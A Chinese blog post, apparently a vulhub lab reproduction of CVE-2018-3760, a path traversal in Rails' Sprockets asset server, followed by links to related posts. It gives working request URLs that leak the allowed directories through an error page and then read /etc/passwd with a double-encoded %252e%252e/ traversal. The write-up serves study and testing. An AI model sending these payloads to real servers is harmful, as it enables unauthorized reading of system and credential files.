Ruby On Rails路径遍历漏洞 CVE-2018-3760 漏洞复现

最新推荐文章于 2024-05-23 17:31:59 发布
最新推荐文章于 2024-05-23 17:31:59 发布
阅读量509 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114242803
版权

Ruby On Rails路径遍历漏洞(CVE-2018-3760)

by ADummy

0x00利用路线

​ 通过报错获取允许目录的列表—>通过允许的目录绕过访问任意文件

0x01漏洞介绍

​ Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。

Sprockets 3.7.1及更低版本中的辅助解码导致路径穿越漏洞。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件。

影响版本
Sprockets <3.7.1

0x02漏洞复现

http://your-ip:3000,您会看到欢迎页面。
在这里插入图片描述

http://your-ip:3000/assets/file:%2f%2f/etc/passwd由于该文件/etc/passwd不在允许的目录中,因此直接访问将产生错误
在这里插入图片描述

我们可以通过错误页面获取允许目录的列表。只需选择其中一个,例如/usr/src/blog/vendor/assets/javascripts,然后使用%252e%252e/跳转到父目录,最后读取文件/etc/passwd

http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/vendor/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

在这里插入图片描述

ADummy_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-3760漏洞(任意文件读取)
千寻的博客
01-07 4068
CVE-2018-3760漏洞(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
CVE-2018-3760——Rails sprockets 任意文件读取漏洞
记录并分享学习安全的知识点..
10-04 641
Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
【已】Sonatype Nexus Repository 3 路径漏洞(CVE-2024-4956)安全风险通告
最新发布
smellycat000的专栏
05-23 224
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Sonatype Nexus Repository 3 路径漏洞漏洞编号QVD-2024-18749,CVE-2024-4956公开时间2024-05-16影响量级十万级奇安信评级高危CVSS 3.1分数7.5威胁类型信息泄露利用可能性高POC状态已公开在野利用状态未发EXP状态已公开技术细节状态已公开危害描述:未经身份认证的远程攻...
CVE-2018-3760漏洞
锋刃科技的博客
09-29 706
简介 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 影响版本 4.0.0.beta7及更低版本 3.7.1及更低版本 2.12.4及更低版本。 环境搭建 使用docker和vulhub安装环境 cd...
Ruby On Rails 路径穿越漏洞CVE-2018-3760)
Yale的博客
03-19 3034
Ruby On Rails 路径穿越漏洞CVE-2018-3760) 前言: 这个漏洞作为路径穿越的典型例子,比较经典,18年跟着文档分析了一遍,最近又重新理了一遍,捎带着写了一遍源码跟踪分析的过程,个人感觉整个跟入调用的思想还是比较清晰的,分析的过程写的比较详细,有兴趣的萌新们也可以跟着分析一遍。 背景: Sprockets中存在信息泄露漏洞。 受影响的版本:4.0.0.beta7及更低版本,...
CVE-2018-3760漏洞(墨者靶场)
2301_78136321的博客
12-06 139
这里用的是墨者靶场的环境1.打开环境可以看到出这样的网页下面给出了提示,这里的漏洞Ruby的任意文件读取的漏洞
CVE-2018-3760 Ruby On Rails 路径穿越漏洞
weixin_51387754的博客
12-13 194
漏洞简介 Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 漏洞 启动一个用Ruby On Rails脚手架生成的默认站点: docker-compose up -d http://127.
Vulhub - Ruby On Rails 路径穿越漏洞CVE-2018-3760)
多崎巡礼的博客
10-30 3688
Ruby On Rails 路径穿越漏洞CVE-2018-3760) Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到...
Rails-doubletap-RCE:使用路径CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
使用路径CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups....
CVE-2020-8163:CVE-2020-8163-Rails中远程执行用户提供的本地名称的代码
03-09
5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞分配了CVE标识符CVE-2020-8163。 受影响的版本:rails <5.0.1不受影响:不允许用户控制本地名称的应用程序。 ...
CVE-2018-1111:CVE-2018-1111 DynoRoot
05-18
CVE-2018-1111,被称为 DynoRoot,是一个针对 Ruby on Rails 应用程序的安全漏洞,该漏洞在2018年被发并公开。Ruby on Rails 是一个流行的开源 Web 开发框架,以其高效、简洁和灵活的代码结构深受开发者喜爱。然而...
rubynostrilhos:关于Ruby on Rails的博客(pt-br)
02-04
【描述】"Ruby Nos Trilhos"表明这是一个帮助开发者沿着Ruby on Rails的学习路径前进的项目。"Esse é o repositório do blog"揭示了这是一个使用版本控制系统(如Git)管理的博客源代码仓库。通过阅读和分析这个...
CVE-2019-5418:CVE-2019-5418-Ruby on Rails上的文件内容披露
02-05
CVE-2019-5418是一个文件内容披露漏洞,存在于Ruby on Rails 5.0.x、5.1.x和5.2.x版本中。主要原因是Rails的ActionDispatch组件在处理某些URL时,未能正确验证和限制文件路径的访问。攻击者可以通过构造特殊的URL...
Ruby On Rails漏洞CVE-2018-3760) --目录穿越
小白鸽
07-31 303
背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 利用方法 版本 <=Sprockets 3.7.1 利用手法 %252e%252e/ 不断返回上级目录 靶场 解题思路 1.用http:/
目录遍攻击详解
metheir的博客
01-08 8294
对于一个安全的Web服务器来说,对Web内容进行恰当的访问控制是极为关键的。目录遍是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。   Web服务器主要提供两个级别的安全机制:   访问控制列表——就是我们常说的ACL   根目录访问   访问控制列表是用于授权过程的,它是一个Web服务器的管理员用来说明什么用户或用
目录遍攻击
大菜鸟的博客
02-11 2万+
原文地址:https://en.wikipedia.org/wiki/Directory_traversal_attack【译】目录遍攻击一次目录遍攻击(directory traversal attack)通常利用了“服务器安全认证缺失”或者“用户提供输入的文件处理操作”,使得服务器端文件操作接口执行了带有“遍父文件目录”意图的恶意输入字符。 这种攻击的目的通常是利用服务器相关(存在安全漏
路径与文件读取漏洞以及其修方案
热门推荐
pygain的博客
10-17 3万+
一些网站的业务需求,可能提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,那么用户就能够查看和下载任意2文件,可以使源代码文件、敏感文件等
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值